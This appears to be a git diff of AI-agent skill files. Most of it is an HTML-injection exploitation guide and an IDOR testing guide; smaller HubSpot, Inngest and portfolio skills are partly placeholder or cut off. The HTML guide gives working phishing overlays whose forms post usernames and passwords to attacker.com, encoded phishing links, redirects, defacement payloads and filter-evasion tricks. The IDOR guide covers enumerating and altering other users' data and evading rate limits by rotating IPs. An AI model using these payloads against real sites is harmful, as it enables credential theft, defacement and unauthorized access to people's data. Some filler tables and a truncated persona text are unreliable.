Identify and exploit HTML injection vulnerabilities that allow attackers to inject malicious HTML content into web applications. This vulnerability enables attackers to modify page appearance, create phishing pages, and steal user credentials through injected forms.

## Prerequisites

### Required Tools

- Web browser with developer tools
- Burp Suite or OWASP ZAP
- Tamper Data or similar proxy
- cURL for testing payloads

### Required Knowledge

- HTML fundamentals
- HTTP request/response structure
- Web application input handling
- Difference between HTML injection and XSS

## Outputs and Deliverables

1. **Vulnerability Report** - Identified injection points
2. **Exploitation Proof** - Demonstrated content manipulation
3. **Impact Assessment** - Potential phishing and defacement risks
4. **Remediation Guidance** - Input validation recommendations
## Core Workflow

### Phase 1: Understanding HTML Injection

HTML injection occurs when user input is reflected in web pages without proper sanitization:

```html
<!-- Vulnerable code example -->
<div>
  Welcome, <?php echo $_GET['name']; ?>
</div>

<!-- Attack input -->
?name=<h1>Injected Content</h1>

<!-- Rendered output -->
<div>
  Welcome, <h1>Injected Content</h1>
</div>
```

Key differences from XSS:

- HTML injection: only HTML tags are rendered
- XSS: JavaScript code is executed
- HTML injection is often a stepping stone to XSS

Attack goals:

- Modify website appearance (defacement)
- Create fake login forms (phishing)
- Inject malicious links
- Display misleading content
### Phase 2: Identifying Injection Points

Map the application for potential injection surfaces:

```
1. Search bars and search results
2. Comment sections
3. User profile fields
4. Contact forms and feedback
5. Registration forms
6. URL parameters reflected on page
7. Error messages
8. Page titles and headers
9. Hidden form fields
10. Cookie values reflected on page
```

Common vulnerable parameters:

```
?name=
?user=
?search=
?query=
?message=
?title=
?content=
?redirect=
?url=
?page=
```
### Phase 3: Basic HTML Injection Testing

Test with simple HTML tags:

```html
<!-- Basic text formatting -->
<h1>Test Injection</h1>
<b>Bold Text</b>
<i>Italic Text</i>
<u>Underlined Text</u>
<font color="red">Red Text</font>

<!-- Structural elements -->
<div style="background:red;color:white;padding:10px">Injected DIV</div>
<p>Injected paragraph</p>
<br><br><br>Line breaks

<!-- Links -->
<a href="http://attacker.com">Click Here</a>
<a href="http://attacker.com">Legitimate Link</a>

<!-- Images -->
<img src="http://attacker.com/image.png">
<img src="x" onerror="alert(1)"> <!-- XSS attempt -->
```

Testing workflow:

```bash
# Test basic injection
curl "http://target.com/search?q=<h1>Test</h1>"

# Check if HTML renders in response
curl -s "http://target.com/search?q=<b>Bold</b>" | grep -i "bold"

# Test in URL-encoded form
curl "http://target.com/search?q=%3Ch1%3ETest%3C%2Fh1%3E"
```
### Phase 4: Types of HTML Injection

#### Stored HTML Injection

Payload persists in the database:

```html
<!-- Profile bio injection -->
Name: John Doe
Bio: <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;">
  <h1>Site Under Maintenance</h1>
  <p>Please login at <a href="http://attacker.com/login">portal.company.com</a></p>
</div>

<!-- Comment injection -->
Great article!
<form action="http://attacker.com/steal" method="POST">
  <input name="username" placeholder="Session expired. Enter username:">
  <input name="password" type="password" placeholder="Password:">
  <input type="submit" value="Login">
</form>
```

#### Reflected GET Injection

Payload in URL parameters:

```html
<!-- URL injection -->
http://target.com/welcome?name=<h1>Welcome%20Admin</h1><form%20action="http://attacker.com/steal">

<!-- Search result injection -->
http://target.com/search?q=<marquee>Your%20account%20has%20been%20compromised</marquee>
```

#### Reflected POST Injection

Payload in POST data:

```bash
# POST injection test
curl -X POST -d "comment=<div style='color:red'>Malicious Content</div>" \
  http://target.com/submit

# Form field injection
curl -X POST -d "name=<script>alert(1)</script>&email=test@test.com" \
  http://target.com/register
```

#### URL-Based Injection

Inject into displayed URLs:

```html
<!-- If URL is displayed on page -->
http://target.com/page/<h1>Injected</h1>

<!-- Path-based injection -->
http://target.com/users/<img src=x>/profile
```
### Phase 5: Phishing Attack Construction

Create convincing phishing forms:

```html
<!-- Fake login form overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:white;z-index:9999;padding:50px;">
  <h2>Session Expired</h2>
  <p>Your session has expired. Please log in again.</p>
  <form action="http://attacker.com/capture" method="POST">
    <label>Username:</label><br>
    <input type="text" name="username" style="width:200px;"><br><br>
    <label>Password:</label><br>
    <input type="password" name="password" style="width:200px;"><br><br>
    <input type="submit" value="Login">
  </form>
</div>

<!-- Tracking style plus a fake verification form
     (the url() only beacons the attacker's server when inputs render;
      the credentials themselves are captured by the form action) -->
<style>
  input { background: url('http://attacker.com/log?data=') }
</style>
<form action="http://attacker.com/steal" method="POST">
  <input name="user" placeholder="Verify your username">
  <input name="pass" type="password" placeholder="Verify your password">
  <button>Verify</button>
</form>
```

URL-encoded phishing link:

```
http://target.com/page?msg=%3Cdiv%20style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3Bbackground%3Awhite%3Bz-index%3A9999%3Bpadding%3A50px%3B%22%3E%3Ch2%3ESession%20Expired%3C%2Fh2%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.com%2Fcapture%22%3E%3Cinput%20name%3D%22user%22%20placeholder%3D%22Username%22%3E%3Cinput%20name%3D%22pass%22%20type%3D%22password%22%3E%3Cbutton%3ELogin%3C%2Fbutton%3E%3C%2Fform%3E%3C%2Fdiv%3E
```
### Phase 6: Defacement Payloads

Website appearance manipulation:

```html
<!-- Full page overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%;
            background:#000;color:#0f0;z-index:9999;
            display:flex;justify-content:center;align-items:center;">
  <h1>HACKED BY SECURITY TESTER</h1>
</div>

<!-- Content replacement -->
<style>body{display:none}</style>
<body style="display:block !important">
  <h1>This site has been compromised</h1>
</body>

<!-- Image injection -->
<img src="http://attacker.com/defaced.jpg"
     style="position:fixed;top:0;left:0;width:100%;height:100%;z-index:9999">

<!-- Marquee injection (visible movement) -->
<marquee behavior="alternate" style="font-size:50px;color:red;">
  SECURITY VULNERABILITY DETECTED
</marquee>
```
### Phase 7: Advanced Injection Techniques

#### CSS Injection

```html
<!-- Style injection -->
<style>
  /* Note: CSS cannot read document.cookie or run JS;
     a url() only beacons the attacker that the page rendered */
  body { background: url('http://attacker.com/track') }
  .content { display: none }
  .fake-content { display: block }
</style>

<!-- Inline style injection -->
<div style="background:url('http://attacker.com/log')">Content</div>
```

#### Meta Tag Injection

```html
<!-- Redirect via meta refresh -->
<meta http-equiv="refresh" content="0;url=http://attacker.com/phish">

<!-- CSP bypass attempt -->
<meta http-equiv="Content-Security-Policy" content="default-src *">
```

#### Form Action Override

```html
<!-- Hijack existing form -->
<form action="http://attacker.com/steal">

<!-- If form already exists, add input -->
<input type="hidden" name="extra" value="data">
</form>
```

#### iframe Injection

```html
<!-- Embed external content -->
<iframe src="http://attacker.com/malicious" width="100%" height="500"></iframe>

<!-- Invisible tracking iframe -->
<iframe src="http://attacker.com/track" style="display:none"></iframe>
```
### Phase 8: Bypass Techniques

Evade basic filters:

```html
<!-- Case variations -->
<H1>Test</H1>
<ScRiPt>alert(1)</ScRiPt>

<!-- Encoding variations -->
&lt;h1&gt;Encoded&lt;/h1&gt;
%3Ch1%3EURL%20Encoded%3C%2Fh1%3E

<!-- Tag splitting -->
<h
1>Split Tag</h1>

<!-- Null bytes -->
<h1%00>Null Byte</h1>

<!-- Double encoding -->
%253Ch1%253EDouble%2520Encoded%253C%252Fh1%253E

<!-- Unicode encoding -->
\u003ch1\u003eUnicode\u003c/h1\u003e

<!-- Attribute-based -->
<div onmouseover="alert(1)">Hover me</div>
<img src=x onerror=alert(1)>
```
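The variations above can be generated from a single payload instead of maintained by hand (a minimal sketch using only the standard library):

```python
from urllib.parse import quote

def variants(payload: str) -> list:
    """Fan one HTML payload out into common filter-evasion encodings."""
    url = quote(payload, safe="")                      # %3Ch1%3E...
    return [
        payload,                                       # raw
        payload.upper(),                               # case variation
        url,                                           # URL-encoded
        quote(url, safe=""),                           # double-encoded (%253C...)
        "".join(f"\\u{ord(c):04x}" for c in payload),  # \u003c-style escapes
    ]

for v in variants("<h1>x</h1>"):
    print(v)
```

Each variant is sent through the same reflection check; whichever survives the filter identifies what the filter normalizes and what it misses.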
### Phase 9: Automated Testing

#### Using Burp Suite

```
1. Capture request with potential injection point
2. Send to Intruder
3. Mark parameter value as payload position
4. Load HTML injection wordlist
5. Start attack
6. Filter responses for rendered HTML
7. Manually verify successful injections
```

#### Using OWASP ZAP

```
1. Spider the target application
2. Active Scan with HTML injection rules
3. Review Alerts for injection findings
4. Validate findings manually
```
#### Custom Fuzzing Script

```python
#!/usr/bin/env python3
import urllib.parse

import requests

target = "http://target.com/search"
param = "q"

payloads = [
    "<h1>Test</h1>",
    "<b>Bold</b>",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<a href='http://evil.com'>Click</a>",
    "<div style='color:red'>Styled</div>",
    "<marquee>Moving</marquee>",
    "<iframe src='http://evil.com'></iframe>",
]

for payload in payloads:
    encoded = urllib.parse.quote(payload)
    url = f"{target}?{param}={encoded}"

    try:
        response = requests.get(url, timeout=5)
        if payload.lower() in response.text.lower():
            # Payload reflected verbatim: likely renders as HTML
            print(f"[+] Possible injection: {payload}")
        elif encoded in response.text:
            # Reflected but still encoded: output escaping is in place
            print(f"[?] Encoded reflection: {payload}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
```
### Phase 10: Prevention and Remediation

Secure coding practices:

```php
// PHP: Escape output
echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

// PHP: Strip tags
echo strip_tags($user_input);

// PHP: Allow specific tags only
echo strip_tags($user_input, '<p><b><i>');
```

```python
# Python: HTML escape
from html import escape
safe_output = escape(user_input)

# Python Flask: Auto-escaping
{{ user_input }}          # Jinja2 escapes by default
{{ user_input | safe }}   # Marks as safe (dangerous!)
```

```javascript
// JavaScript: Text content (safe)
element.textContent = userInput;

// JavaScript: innerHTML (dangerous!)
element.innerHTML = userInput; // Vulnerable!

// JavaScript: Sanitize
const clean = DOMPurify.sanitize(userInput);
element.innerHTML = clean;
```

Server-side protections:

- Input validation (whitelist allowed characters)
- Output encoding (context-aware escaping)
- Content Security Policy (CSP) headers
- Web Application Firewall (WAF) rules
## Quick Reference

### Common Test Payloads

| Payload | Purpose |
|---------|---------|
| `<h1>Test</h1>` | Basic rendering test |
| `<b>Bold</b>` | Simple formatting |
| `<a href="evil.com">Link</a>` | Link injection |
| `<img src=x>` | Image tag test |
| `<div style="color:red">` | Style injection |
| `<form action="evil.com">` | Form hijacking |

### Injection Contexts

| Context | Test Approach |
|---------|---------------|
| URL parameter | `?param=<h1>test</h1>` |
| Form field | POST with HTML payload |
| Cookie value | Inject via document.cookie |
| HTTP header | Inject in Referer/User-Agent |
| File upload | HTML file with malicious content |

### Encoding Types

| Type | Example |
|------|---------|
| URL encoding | `%3Ch1%3E` = `<h1>` |
| HTML entities | `&lt;h1&gt;` = `<h1>` |
| Double encoding | `%253C` = `<` |
| Unicode | `\u003c` = `<` |

## Constraints and Limitations

### Attack Limitations

- Modern browsers may sanitize some injections
- CSP can prevent inline styles and scripts
- WAFs may block common payloads
- Some applications escape output properly

### Testing Considerations

- Distinguish between HTML injection and XSS
- Verify visual impact in browser
- Test in multiple browsers
- Check for stored vs reflected

### Severity Assessment

- Lower severity than XSS (no script execution)
- Higher impact when combined with phishing
- Consider defacement/reputation damage
- Evaluate credential theft potential

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| HTML not rendering | Check if output is HTML-encoded; try encoding variations; verify HTML context |
| Payload stripped | Use encoding variations; try tag splitting; test null bytes; nested tags |
| XSS not working (HTML only) | JS filtered but HTML allowed; leverage phishing forms, meta refresh redirects |
42 skills/hubspot-integration/SKILL.md Normal file

@@ -0,0 +1,42 @@
---
name: hubspot-integration
description: "Expert patterns for HubSpot CRM integration including OAuth authentication, CRM objects, associations, batch operations, webhooks, and custom objects. Covers Node.js and Python SDKs. Use when: hubspot, hubspot api, hubspot crm, hubspot integration, contacts api."
source: vibeship-spawner-skills (Apache 2.0)
---

# HubSpot Integration

## Patterns

### OAuth 2.0 Authentication

Secure authentication for public apps

### Private App Token

Authentication for single-account integrations

### CRM Object CRUD Operations

Create, read, update, delete CRM records
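The private-app-token flow and a basic create can be sketched with plain `requests` against HubSpot's v3 objects API (the endpoint follows HubSpot's documented `/crm/v3/objects/contacts` path; reading the token from a `HUBSPOT_TOKEN` environment variable is an assumption of this sketch, not part of any SDK):

```python
import os

import requests

BASE = "https://api.hubapi.com/crm/v3/objects/contacts"

def auth_headers(token: str) -> dict:
    # Private app tokens go in a Bearer header,
    # not the deprecated ?hapikey= query parameter.
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

def create_contact(token: str, email: str, firstname: str) -> dict:
    """Create one contact; returns the created record as JSON."""
    body = {"properties": {"email": email, "firstname": firstname}}
    resp = requests.post(BASE, headers=auth_headers(token), json=body, timeout=10)
    resp.raise_for_status()
    return resp.json()

# usage (requires a real private app token):
# contact = create_contact(os.environ["HUBSPOT_TOKEN"], "test@example.com", "Test")
```

For many records, prefer the batch endpoints over a loop of single creates — that is exactly the anti-pattern called out below.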
## Anti-Patterns

### ❌ Using Deprecated API Keys

### ❌ Individual Requests Instead of Batch

### ❌ Polling Instead of Webhooks

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Issue | high | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | high | See docs |
| Issue | critical | See docs |
| Issue | medium | See docs |
| Issue | high | See docs |
| Issue | medium | See docs |
439 skills/idor-testing/SKILL.md Normal file

@@ -0,0 +1,439 @@
---
name: IDOR Vulnerability Testing
description: This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references," or "bypass authorization to access other users' data." It provides comprehensive guidance for detecting, exploiting, and remediating IDOR vulnerabilities in web applications.
---

# IDOR Vulnerability Testing

## Purpose

Provide systematic methodologies for identifying and exploiting Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. This skill covers both database object references and static file references, detection techniques using parameter manipulation and enumeration, exploitation via Burp Suite, and remediation strategies for securing applications against unauthorized access.

## Inputs / Prerequisites

- **Target Web Application**: URL of application with user-specific resources
- **Multiple User Accounts**: At least two test accounts to verify cross-user access
- **Burp Suite or Proxy Tool**: Intercepting proxy for request manipulation
- **Authorization**: Written permission for security testing
- **Understanding of Application Flow**: Knowledge of how objects are referenced (IDs, filenames)

## Outputs / Deliverables

- **IDOR Vulnerability Report**: Documentation of discovered access control bypasses
- **Proof of Concept**: Evidence of unauthorized data access across user contexts
- **Affected Endpoints**: List of vulnerable API endpoints and parameters
- **Impact Assessment**: Classification of data exposure severity
- **Remediation Recommendations**: Specific fixes for identified vulnerabilities
## Core Workflow

### 1. Understand IDOR Vulnerability Types

#### Direct Reference to Database Objects

Occurs when applications reference database records via user-controllable parameters:

```
# Original URL (authenticated as User A)
example.com/user/profile?id=2023

# Manipulation attempt (accessing User B's data)
example.com/user/profile?id=2022
```

#### Direct Reference to Static Files

Occurs when applications expose file paths or names that can be enumerated:

```
# Original URL (User A's receipt)
example.com/static/receipt/205.pdf

# Manipulation attempt (User B's receipt)
example.com/static/receipt/200.pdf
```

### 2. Reconnaissance and Setup

#### Create Multiple Test Accounts

```
Account 1: "attacker" - Primary testing account
Account 2: "victim" - Account whose data we attempt to access
```

#### Identify Object References

Capture and analyze requests containing:

- Numeric IDs in URLs: `/api/user/123`
- Numeric IDs in parameters: `?id=123&action=view`
- Numeric IDs in request body: `{"userId": 123}`
- File paths: `/download/receipt_123.pdf`
- GUIDs/UUIDs: `/profile/a1b2c3d4-e5f6-...`

#### Map User IDs

```
# Access user ID endpoint (if available)
GET /api/user-id/

# Note ID patterns:
# - Sequential integers (1, 2, 3...)
# - Auto-incremented values
# - Predictable patterns
```
### 3. Detection Techniques

#### URL Parameter Manipulation

```
# Step 1: Capture original authenticated request
GET /api/user/profile?id=1001 HTTP/1.1
Cookie: session=attacker_session

# Step 2: Modify ID to target another user
GET /api/user/profile?id=1000 HTTP/1.1
Cookie: session=attacker_session

# Vulnerable if: Returns victim's data with attacker's session
```
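The manual swap above can be automated: replay the request under the attacker's session and check the response for data deliberately planted in the victim's account (a sketch; the endpoint, cookie name, and marker value are hypothetical):

```python
import requests

def looks_vulnerable(status: int, body: str, victim_marker: str) -> bool:
    # A 200 that echoes data planted in the *victim's* account is the IDOR
    # signal; 401/403 mean access control held, 404 means no such object.
    return status == 200 and victim_marker in body

def check_id(url: str, object_id: int, attacker_session: str, marker: str) -> bool:
    """Fetch one object ID with the attacker's session and classify the result."""
    resp = requests.get(url, params={"id": object_id},
                        cookies={"session": attacker_session}, timeout=5)
    return looks_vulnerable(resp.status_code, resp.text, marker)

# usage against a hypothetical endpoint:
# check_id("http://target.com/api/user/profile", 1000,
#          "attacker_session", "victim@example.com")
```

Planting a unique marker (e.g. a one-off email address) in the victim account beforehand is what makes a 200 response conclusive rather than ambiguous.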
#### Request Body Manipulation

```
# Original POST request
POST /api/address/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session

{"id": 5, "userId": 1001, "address": "123 Attacker St"}

# Modified request targeting victim
{"id": 5, "userId": 1000, "address": "123 Attacker St"}
```

#### HTTP Method Switching

```
# Original GET request may be protected
GET /api/admin/users/1000 → 403 Forbidden

# Try alternative methods
POST /api/admin/users/1000 → 200 OK (Vulnerable!)
PUT  /api/admin/users/1000 → 200 OK (Vulnerable!)
```
### 4. Exploitation with Burp Suite

#### Manual Exploitation

```
1. Configure browser proxy through Burp Suite
2. Login as "attacker" user
3. Navigate to profile/data page
4. Enable Intercept in Proxy tab
5. Capture request with user ID
6. Modify ID to victim's ID
7. Forward request
8. Observe response for victim's data
```

#### Automated Enumeration with Intruder

```
1. Send request to Intruder (Ctrl+I)
2. Clear all payload positions
3. Select ID parameter as payload position
4. Configure attack type: Sniper
5. Payload settings:
   - Type: Numbers
   - Range: 1 to 10000
   - Step: 1
6. Start attack
7. Analyze responses for 200 status codes
```
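The same Sniper-style sweep can be scripted directly when Burp is unavailable (a sketch; the URL template and session cookie are hypothetical, and the delay plays the role of Intruder's throttle setting):

```python
import time

import requests

def target_url(template: str, obj_id: int) -> str:
    # Substitute the payload position (the {id} slot) into the request URL.
    return template.format(id=obj_id)

def enumerate_ids(template: str, session_cookie: str, id_range, delay: float = 0.5):
    """Sniper-style sweep: try each ID, collect those that return 200."""
    hits = []
    for obj_id in id_range:
        resp = requests.get(target_url(template, obj_id),
                            cookies={"session": session_cookie}, timeout=5)
        if resp.status_code == 200:
            hits.append(obj_id)  # candidate IDOR: verify data ownership manually
        time.sleep(delay)        # throttle to stay under rate limits
    return hits

# usage (hypothetical endpoint):
# enumerate_ids("http://target.com/api/user/profile?id={id}", "abc123", range(1, 101))
```

As with Intruder output, a 200 only marks a candidate; each hit still needs manual confirmation that the returned record belongs to another user.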
#### Battering Ram Attack for Multiple Positions

```
# When same ID appears in multiple locations
PUT /api/addresses/§5§/update HTTP/1.1

{"id": §5§, "userId": 3}

Attack Type: Battering Ram
Payload: Numbers 1-1000
```

### 5. Common IDOR Locations

#### API Endpoints

```
/api/user/{id}
/api/profile/{id}
/api/order/{id}
/api/invoice/{id}
/api/document/{id}
/api/message/{id}
/api/address/{id}/update
/api/address/{id}/delete
```

#### File Downloads

```
/download/invoice_{id}.pdf
/static/receipts/{id}.pdf
/uploads/documents/{filename}
/files/reports/report_{date}_{id}.xlsx
```

#### Query Parameters

```
?userId=123
?orderId=456
?documentId=789
?file=report_123.pdf
?account=user@email.com
```
## Quick Reference

### IDOR Testing Checklist

| Test | Method | Indicator of Vulnerability |
|------|--------|---------------------------|
| Increment/Decrement ID | Change `id=5` to `id=4` | Returns different user's data |
| Use Victim's ID | Replace with known victim ID | Access granted to victim's resources |
| Enumerate Range | Test IDs 1-1000 | Find valid records of other users |
| Negative Values | Test `id=-1` or `id=0` | Unexpected data or errors |
| Large Values | Test `id=99999999` | System information disclosure |
| String IDs | Change format `id=user_123` | Logic bypass |
| GUID Manipulation | Modify UUID portions | Predictable UUID patterns |

### Response Analysis

| Status Code | Interpretation |
|-------------|----------------|
| 200 OK | Potential IDOR - verify data ownership |
| 403 Forbidden | Access control working |
| 404 Not Found | Resource doesn't exist |
| 401 Unauthorized | Authentication required |
| 500 Error | Potential input validation issue |

### Common Vulnerable Parameters

| Parameter Type | Examples |
|----------------|----------|
| User identifiers | `userId`, `uid`, `user_id`, `account` |
| Resource identifiers | `id`, `pid`, `docId`, `fileId` |
| Order/Transaction | `orderId`, `transactionId`, `invoiceId` |
| Message/Communication | `messageId`, `threadId`, `chatId` |
| File references | `filename`, `file`, `document`, `path` |
## Constraints and Limitations

### Operational Boundaries

- Requires at least two valid user accounts for verification
- Some applications use session-bound tokens instead of IDs
- GUID/UUID references are harder to enumerate but not impossible
- Rate limiting may restrict enumeration attempts
- Some IDORs require chained vulnerabilities to exploit

### Detection Challenges

- Horizontal privilege escalation (user-to-user) vs vertical (user-to-admin)
- Blind IDOR where the response doesn't confirm access
- Time-based IDOR in asynchronous operations
- IDOR in WebSocket communications

### Legal Requirements

- Only test applications with explicit authorization
- Document all testing activities and findings
- Do not access, modify, or exfiltrate real user data
- Report findings through proper disclosure channels
## Examples

### Example 1: Basic ID Parameter IDOR

```
# Login as attacker (userId=1001)
# Navigate to profile page

# Original request
GET /api/profile?id=1001 HTTP/1.1
Cookie: session=abc123

# Response: Attacker's profile data

# Modified request (targeting victim userId=1000)
GET /api/profile?id=1000 HTTP/1.1
Cookie: session=abc123

# Vulnerable Response: Victim's profile data returned!
```

### Example 2: IDOR in Address Update Endpoint

```
# Intercept address update request
PUT /api/addresses/5/update HTTP/1.1
Content-Type: application/json
Cookie: session=attacker_session

{
  "id": 5,
  "userId": 1001,
  "street": "123 Main St",
  "city": "Test City"
}

# Modify userId to victim's ID
{
  "id": 5,
  "userId": 1000,   # Changed from 1001
  "street": "Hacked Address",
  "city": "Exploit City"
}

# If 200 OK: Address created under victim's account
```

### Example 3: Static File IDOR

```
# Download own receipt
GET /api/download/5 HTTP/1.1
Cookie: session=attacker_session

# Response: PDF of attacker's receipt (order #5)

# Attempt to access other receipts
GET /api/download/3 HTTP/1.1
Cookie: session=attacker_session

# Vulnerable Response: PDF of victim's receipt (order #3)!
```

### Example 4: Burp Intruder Enumeration

```
# Configure Intruder attack
Target: PUT /api/addresses/§1§/update
Payload Position: Address ID in URL and body

Attack Configuration:
- Type: Battering Ram
- Payload: Numbers 0-20, Step 1

Body Template:
{
  "id": §1§,
  "userId": 3
}

# Analyze results:
# - 200 responses indicate successful modification
# - Check victim's account for new addresses
```

### Example 5: Horizontal to Vertical Escalation

```
# Step 1: Enumerate user roles
GET /api/user/1 → {"role": "user", "id": 1}
GET /api/user/2 → {"role": "user", "id": 2}
GET /api/user/3 → {"role": "admin", "id": 3}

# Step 2: Access admin functions with discovered ID
GET /api/admin/dashboard?userId=3 HTTP/1.1
Cookie: session=regular_user_session

# If accessible: Vertical privilege escalation achieved
```
## Troubleshooting

### Issue: All Requests Return 403 Forbidden

**Cause**: Server-side access control is implemented

**Solution**:

```
# Try alternative attack vectors:
1. HTTP method switching (GET → POST → PUT)
2. Add X-Original-URL or X-Rewrite-URL headers
3. Try parameter pollution: ?id=1001&id=1000
4. URL encoding variations: %31%30%30%30 for "1000"
5. Case variations for string IDs
```

### Issue: Application Uses UUIDs Instead of Sequential IDs

**Cause**: Randomized identifiers reduce enumeration risk

**Solution**:

```
# UUID discovery techniques:
1. Check response bodies for leaked UUIDs
2. Search JavaScript files for hardcoded UUIDs
3. Check API responses that list multiple objects
4. Look for UUID patterns in error messages
5. Try UUID v1 (time-based) prediction if applicable
```

### Issue: Session Token Bound to User

**Cause**: Application validates session against requested resource

**Solution**:

```
# Advanced bypass attempts:
1. Test for IDOR in unauthenticated endpoints
2. Check password reset/email verification flows
3. Look for IDOR in file upload/download
4. Test API versioning: /api/v1/ vs /api/v2/
5. Check mobile API endpoints (often less protected)
```

### Issue: Rate Limiting Blocks Enumeration

**Cause**: Application implements request throttling

**Solution**:

```
# Bypass techniques:
1. Add delays between requests (Burp Intruder throttle)
2. Rotate IP addresses (proxy chains)
3. Target specific high-value IDs instead of full range
4. Use different endpoints for same resources
5. Test during off-peak hours
```

### Issue: Cannot Verify IDOR Impact

**Cause**: Response doesn't clearly indicate data ownership

**Solution**:

```
# Verification methods:
1. Create unique identifiable data in victim account
2. Look for PII markers (name, email) in responses
|
||||
3. Compare response lengths between users
|
||||
4. Check for timing differences in responses
|
||||
5. Use secondary indicators (creation dates, metadata)
|
||||
```
|
||||
|
||||
## Remediation Guidance
|
||||
|
||||
### Implement Proper Access Control
|
||||
```python
|
||||
# Django example - validate ownership
|
||||
def update_address(request, address_id):
|
||||
address = Address.objects.get(id=address_id)
|
||||
|
||||
# Verify ownership before allowing update
|
||||
if address.user != request.user:
|
||||
return HttpResponseForbidden("Unauthorized")
|
||||
|
||||
# Proceed with update
|
||||
address.update(request.data)
|
||||
```
|
||||
|
||||
### Use Indirect References
|
||||
```python
|
||||
# Instead of: /api/address/123
|
||||
# Use: /api/address/current-user/billing
|
||||
|
||||
def get_address(request):
|
||||
# Always filter by authenticated user
|
||||
address = Address.objects.filter(user=request.user).first()
|
||||
return address
|
||||
```
|
||||
|
||||
### Server-Side Validation
|
||||
```python
|
||||
# Always validate on server, never trust client input
|
||||
def download_receipt(request, receipt_id):
|
||||
receipt = Receipt.objects.filter(
|
||||
id=receipt_id,
|
||||
user=request.user # Critical: filter by current user
|
||||
).first()
|
||||
|
||||
if not receipt:
|
||||
return HttpResponseNotFound()
|
||||
|
||||
return FileResponse(receipt.file)
|
||||
```
|
||||
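The same ownership rule translates to any stack. A minimal framework-agnostic sketch in JavaScript; the `session` and `resource` shapes here are illustrative assumptions, not a specific framework's API:

```javascript
// Authorize strictly from the server-side session; never from
// client-supplied ids in the URL or request body.
function authorizeResource(session, resource) {
  if (!session || session.userId == null) {
    return { status: 401, body: "Unauthenticated" };
  }
  if (resource.ownerId !== session.userId) {
    // The decision compares the session's user to the resource owner only.
    return { status: 403, body: "Unauthorized" };
  }
  return { status: 200, body: resource };
}

// Owner can read their own address; another user cannot.
const address = { id: 5, ownerId: 1001, street: "123 Main St" };
authorizeResource({ userId: 1001 }, address).status; // 200
authorizeResource({ userId: 1000 }, address).status; // 403
```

The key property is that the request's `id` parameter is only ever used to look the resource up, never to decide who is allowed to see it.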
55 skills/inngest/SKILL.md Normal file
@@ -0,0 +1,55 @@
---
name: inngest
description: "Inngest expert for serverless-first background jobs, event-driven workflows, and durable execution without managing queues or workers. Use when: inngest, serverless background job, event-driven workflow, step function, durable execution."
source: vibeship-spawner-skills (Apache 2.0)
---

# Inngest Integration

You are an Inngest expert who builds reliable background processing without
managing infrastructure. You understand that serverless doesn't mean you can't
have durable, long-running workflows - it means you don't manage the workers.

You've built AI pipelines that take minutes, onboarding flows that span days,
and event-driven systems that process millions of events. You know that the
magic of Inngest is in its steps - each one a checkpoint that survives failures.

Your core philosophy:
1. Event

## Capabilities

- inngest-functions
- event-driven-workflows
- step-functions
- serverless-background-jobs
- durable-sleep
- fan-out-patterns
- concurrency-control
- scheduled-functions

## Patterns

### Basic Function Setup

Inngest function with typed events in Next.js

### Multi-Step Workflow

Complex workflow with parallel steps and error handling

### Scheduled/Cron Functions

Functions that run on a schedule

## Anti-Patterns

### ❌ Not Using Steps

### ❌ Huge Event Payloads

### ❌ Ignoring Concurrency

## Related Skills

Works well with: `nextjs-app-router`, `vercel-deployment`, `supabase-backend`, `email-systems`, `ai-agents-architect`, `stripe-integration`

223 skills/interactive-portfolio/SKILL.md Normal file
@@ -0,0 +1,223 @@
---
name: interactive-portfolio
description: "Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios, and portfolios that convert visitors into opportunities. Use when: portfolio, personal website, showcase work, developer portfolio, designer portfolio."
source: vibeship-spawner-skills (Apache 2.0)
---

# Interactive Portfolio

**Role**: Portfolio Experience Designer

You know a portfolio isn't a resume - it's a first impression that needs
to convert. You balance creativity with usability. You understand that
hiring managers spend 30 seconds on each portfolio. You make those 30
seconds count. You help people stand out without being gimmicky.

## Capabilities

- Portfolio architecture
- Project showcase design
- Interactive case studies
- Personal branding for devs/designers
- Contact conversion
- Portfolio performance
- Work presentation
- Testimonial integration

## Patterns

### Portfolio Architecture

Structure that works for portfolios

**When to use**: When planning portfolio structure

```javascript
## Portfolio Architecture

### The 30-Second Test
In 30 seconds, visitors should know:
1. Who you are
2. What you do
3. Your best work
4. How to contact you

### Essential Sections
| Section | Purpose | Priority |
|---------|---------|----------|
| Hero | Hook + identity | Critical |
| Work/Projects | Prove skills | Critical |
| About | Personality + story | Important |
| Contact | Convert interest | Critical |
| Testimonials | Social proof | Nice to have |
| Blog/Writing | Thought leadership | Optional |

### Navigation Patterns
```
Option 1: Single page scroll
- Best for: Designers, creatives
- Works well with animations
- Mobile friendly

Option 2: Multi-page
- Best for: Lots of projects
- Individual case study pages
- Better for SEO

Option 3: Hybrid
- Main sections on one page
- Detailed case studies separate
- Best of both worlds
```

### Hero Section Formula
```
[Your name]
[What you do in one line]
[One line that differentiates you]
[CTA: View Work / Contact]
```
```

### Project Showcase

How to present work effectively

**When to use**: When building project sections

```javascript
## Project Showcase

### Project Card Elements
| Element | Purpose |
|---------|---------|
| Thumbnail | Visual hook |
| Title | What it is |
| One-liner | What you did |
| Tech/tags | Quick scan |
| Results | Proof of impact |

### Case Study Structure
```
1. Hero image/video
2. Project overview (2-3 sentences)
3. The challenge
4. Your role
5. Process highlights
6. Key decisions
7. Results/impact
8. Learnings (optional)
9. Links (live, GitHub, etc.)
```

### Showing Impact
| Instead of | Write |
|------------|-------|
| "Built a website" | "Increased conversions 40%" |
| "Designed UI" | "Reduced user drop-off 25%" |
